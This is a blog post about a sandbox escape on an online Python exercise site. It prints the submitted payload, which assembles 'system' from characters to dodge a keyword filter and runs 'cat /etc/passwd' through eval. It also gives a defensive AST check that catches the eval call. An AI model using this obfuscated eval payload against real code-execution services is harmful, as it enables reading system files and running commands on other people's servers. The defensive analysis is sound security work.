Today I saw an interesting vulnerability on Wooyun. It is interesting for two reasons: first, the idea is unusual (although, of course, it only works because security is very low); second, the Python PoC contains a small detail that I want to share here.
The website is called Fenby Network and is mainly for Python developers learning online. It has an online exercise feature: you can enter code, execute it, and see the results of the test run ...
So the original poster registered an account, URL: http://www.fenby.com/course/units/xxxx
Then entered the following malicious code:
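    import string

    # Build the name "system" from pieces so the literal never appears in the source
    s = ["s", "y", "s", "t", "e", "m"]
    s = "".join(s)
    cmd = "cat /etc/passwd"
    # Assembles the expression __import__('os').system('cat /etc/passwd')
    code = "__import__('os')." + s + "('" + cmd + "')"
    eval(code)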
So that's it ...
I would like to make two points here. First, the cause of the vulnerability is that eval is not filtered. Second, the code relies on the difference between import and __import__.
The import statement actually calls __import__, but writing code = "__import__('package.module')" directly is not the same as: import package.module as package
"When the name variable is of the form package.module, normally, the top-level package (the name up till the first dot) is returned, not the module named by name."
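The two points above, as an added example that is not code from the original post: a substring blacklist misses the submission because "system" is assembled at run time, while an AST walk still sees the eval call, and import_semantics shows what __import__ returns for a dotted name. The banned-word list, the DYNAMIC_BUILTINS set and all function names are assumptions; a static check like this is a first gate in front of a sandbox, not a replacement for one.

```python
import ast
import importlib

# The submission from the post, held as data only; it is never executed here.
SUBMISSION = '''\
s = ["s", "y", "s", "t", "e", "m"]
s = "".join(s)
cmd = "cat /etc/passwd"
code = "__import__('os')." + s + "('" + cmd + "')"
eval(code)
'''

# Builtins that run or load code chosen at run time (this set is an assumption).
DYNAMIC_BUILTINS = {"eval", "exec", "compile", "__import__"}


def keyword_filter(source, banned=("os.system", "import os", "subprocess")):
    """Naive substring blacklist: return the banned strings found in source."""
    return [word for word in banned if word in source]


def dynamic_calls(source):
    """Return (line, name) for each direct call to a dynamic-code builtin."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DYNAMIC_BUILTINS):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)


def import_semantics(name="email.mime"):
    """Show which module each import spelling returns for a dotted name."""
    return {
        "__import__": __import__(name).__name__,
        "fromlist": __import__(name, fromlist=["*"]).__name__,
        "import_module": importlib.import_module(name).__name__,
    }


if __name__ == "__main__":
    print(keyword_filter(SUBMISSION))   # the blacklist finds nothing
    print(dynamic_calls(SUBMISSION))    # the AST check flags the eval call
    print(import_semantics())
```

The source is only parsed, never run, so the check is safe to apply to untrusted submissions before they reach an interpreter.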
This article is from the "Lao Xu's Private Food" blog; reprinting is declined!
Interesting examples of Python penetration